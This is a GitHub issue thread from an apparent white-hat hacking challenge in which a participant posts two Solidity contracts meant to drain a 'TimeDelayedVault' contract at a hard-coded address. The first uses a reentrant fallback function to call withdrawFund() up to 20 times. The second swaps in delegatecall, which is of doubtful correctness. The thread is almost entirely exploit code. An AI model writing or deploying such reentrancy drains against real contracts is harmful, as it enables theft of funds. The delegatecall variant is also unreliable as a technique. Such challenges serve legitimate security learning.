search

Huaida / WhiteHatHackerChallenge

0 stars 0 forks source link

一种可能的调用TimeDelayedVault合约的方法 #5

Closed yyssjj33 closed 6 years ago

yyssjj33 commented 6 years ago 

pragma solidity ^0.4.17;

contract TimeDelayedVault { // This doesn't have to match the real contract name. Call it what you like.
   function withdrawFund() returns(bool); // No implementation, just the function signature. This is just so Solidity can work out how to call it.
}
contract oobserver {
    address target = 0x1284f5A4aC6CeB99C23679Cb2F757EFBd2D960AC;
    TimeDelayedVault t;
    uint stack = 0;
    function oobserver() {
        t  = TimeDelayedVault(target);
    }
    function observer() {
        attack();
    }

    function attack() {
       t.withdrawFund();
    }
    function() payable {
        if (stack++ < 20) {
            t.withdrawFund();
        }

    }
}

ref: https://ethereum.stackexchange.com/a/11481

yyssjj33 commented 6 years ago

这个可能work

pragma solidity ^0.4.17;

contract oobserver {
    address target = 0x1284f5A4aC6CeB99C23679Cb2F757EFBd2D960AC;
    uint stack = 0;

    function observer() {
        attack();
    }

    function attack() payable {
       address(target).delegatecall(bytes4(sha3("withdrawFund()")));
    }
    function() payable {
        if (stack++ < 20) {
            address(target).delegatecall(bytes4(sha3("withdrawFund()")));
        }

    }
}